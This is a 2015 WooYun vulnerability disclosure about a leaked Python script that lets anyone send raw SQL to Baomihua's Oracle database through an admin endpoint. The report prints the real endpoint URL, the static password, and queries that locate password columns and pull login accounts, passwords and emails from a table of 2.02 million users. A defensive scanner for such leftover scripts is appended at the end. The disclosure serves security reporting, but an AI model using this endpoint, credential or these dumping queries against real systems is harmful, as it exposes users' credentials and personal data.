Vulnerability Summary

Defect ID: wooyun-2015-0116245

Title: Baomihua Oracle query script leaked (2.02 million user records exposed to database dumping)

Vendor: Baomihua (爆米花网)

Author: lijiejie

Submitted: 2015-05-26 11:40

Fix time: 2015-05-31 11:42

Published: 2015-05-31 11:42

Vulnerability type: Disclosure of important sensitive information

Severity: Medium

Self-rated Rank: 6

Status: Vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2015-05-26: Details sent to the vendor, awaiting vendor handling
2015-05-31: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Baomihua Oracle query script leaked (2.02 million user records exposed to database dumping)

Detailed description:

A while ago I found a Python script on a server but did not get around to using it.
I took a look today: through the query interface, user data can be fetched directly.

import os
import traceback
import requests

# myprint: logging helper defined elsewhere in the leaked script (not shown on this page)

def __execute_main(sql, max_line):  # primary database
    assert isinstance(sql, unicode)
    try:
        myprint(u'语句main:{0}'.format(sql))
        # The static "psw" value is the only authentication the admin endpoint performs;
        # the SQL text is forwarded verbatim in the POST body.
        payload = u'sqlCode={0}\r\nnum={1}\r\npsw={2}'.format(sql, max_line, 't34iofxnamby7vu6')
        payload = payload.encode('utf8')
        r = requests.post("http://pomoho.pxtadmin.com:8080/ajax/PmhManager.dbSearch,PmhManager.ashx?_method=GetResultList&_session=rw",
                          data=payload, timeout=300)
        return r.text
    except:
        trace_info = traceback.format_exc()
        trace_info = trace_info.replace('\n', '###')
        shell = 'start ""cmd echo "{0}"'.format(trace_info)
        myprint(shell)
        os.system(shell)

Proof of vulnerability:

select banner from sys.v_$version where rownum=1

Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production


Query which tables have password-related columns:
select TABLE_NAME, COLUMN_NAME from all_tab_columns where COLUMN_NAME like '%PASS%'

[[u'TABLE_NAME', u'COLUMN_NAME', u'NUM'],
[u'SMMSUSERS', u'PASSWORD', u'1'],
[u'PMHNEWSUNIONMEMBERS', u'LOGINPASSWORD', u'2'],
[u'SMMSCOOPSITES', u'PASSWORD', u'3'],
[u'PMHUSERSHIS', u'LOGINPASSWORD', u'4'],
[u'PMHOAUSER', u'U_PASSWORD', u'5'],
[u'PMHUSERQUALITYSTAT', u'PASSVIDEOCOUNT', u'6'],
[u'PUBUNIONOPERATOR', u'PASSWORD', u'7'],
[u'PMH_CHANNELSTAT_DEVELOPMENT', u'FIRSTPASSCOUNT', u'8'],
[u'PMH_CHANNELSTAT_DEVELOPMENT', u'FIRSTNOTPASSCOUNT', u'9'],
[u'PMH_CHANNELSTAT_DEVELOPMENT', u'SECONDPASSCOUNT', u'10']]


Skipping the tables with little data, querying PMHUSERSHIS gives a user count of 2.02 million:

[screenshot: baomihua.users.png]


As a test, fetch a few dozen rows (select LOGINACCOUNT,LOGINPASSWORD,EMAIL from PMHUSERSHIS where rownum < 100)


Fix suggestion:

Do not leave such scripts directly on servers.
Change the password.

Copyright notice: please credit lijiejie@WooYun when reposting
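As a check that supports the fix suggested above (an added example, not code from the report or the vendor), this Python 3 script walks a source file's AST and flags the pattern of the leaked script: a request template carrying a literal credential and raw SQL, plus a hardcoded admin endpoint. The host, secret and sample sources are constructed placeholders.

```python
import ast
import re
from typing import List, Tuple

# Hypothetical checker (added example, Python 3.8+): flags Python sources that
# forward raw SQL to a remote admin endpoint with a credential embedded in the
# file, the pattern of the leaked query script described in this report.
CRED_KEY = re.compile(r'(?:^|[&\r\n])(psw|pwd|passwd|password)=', re.IGNORECASE)
SQL_KEY = re.compile(r'(?:^|[&\r\n])(sqlCode|sql|query)=', re.IGNORECASE)
ADMIN_URL = re.compile(r'://[^/]*admin', re.IGNORECASE)

def _const_str(node):
    """String value of a literal node, else None."""
    return node.value if isinstance(node, ast.Constant) and isinstance(node.value, str) else None

def scan_source(src: str) -> List[Tuple[int, str]]:
    """Return (line number, finding) pairs for one Python source file."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if not isinstance(node, ast.Call) or not isinstance(node.func, ast.Attribute):
            continue
        # Case 1: "...psw={n}...".format(..., 'literal'): a request template with
        # the credential as a string literal and/or raw SQL as a body field.
        if node.func.attr == 'format':
            tmpl = _const_str(node.func.value)
            if tmpl and CRED_KEY.search(tmpl):
                if any(_const_str(a) is not None for a in node.args):
                    findings.append((node.lineno, 'credential literal in request template'))
                if SQL_KEY.search(tmpl):
                    findings.append((node.lineno, 'raw SQL forwarded in request body'))
        # Case 2: requests.post/get(<literal URL on an admin host>, ...)
        if (isinstance(node.func.value, ast.Name) and node.func.value.id == 'requests'
                and node.func.attr in ('post', 'get') and node.args):
            url = _const_str(node.args[0])
            if url and ADMIN_URL.search(url):
                findings.append((node.lineno, 'hardcoded admin endpoint: ' + url))
    return findings

# Constructed samples (placeholder host and secret, not values from the report).
SAMPLE_LEAKED = '''import requests
def query(sql, max_line):
    payload = u"sqlCode={0}\\r\\nnum={1}\\r\\npsw={2}".format(sql, max_line, "EXAMPLE_STATIC_PSW")
    r = requests.post("http://admin.example.invalid:8080/ajax/dbSearch.ashx", data=payload)
    return r.text
'''
SAMPLE_CLEAN = '''import requests
def fetch(report_id):
    return requests.get("https://api.example.invalid/reports/" + str(report_id)).text
'''
```

Run scan_source over every .py file found on a server to list leftover client scripts of this kind before they are found by someone else.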


Vulnerability Response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-05-31 11:42

Vendor reply:

Vulnerability Rank: 8 (WooYun rating)

Latest status:

None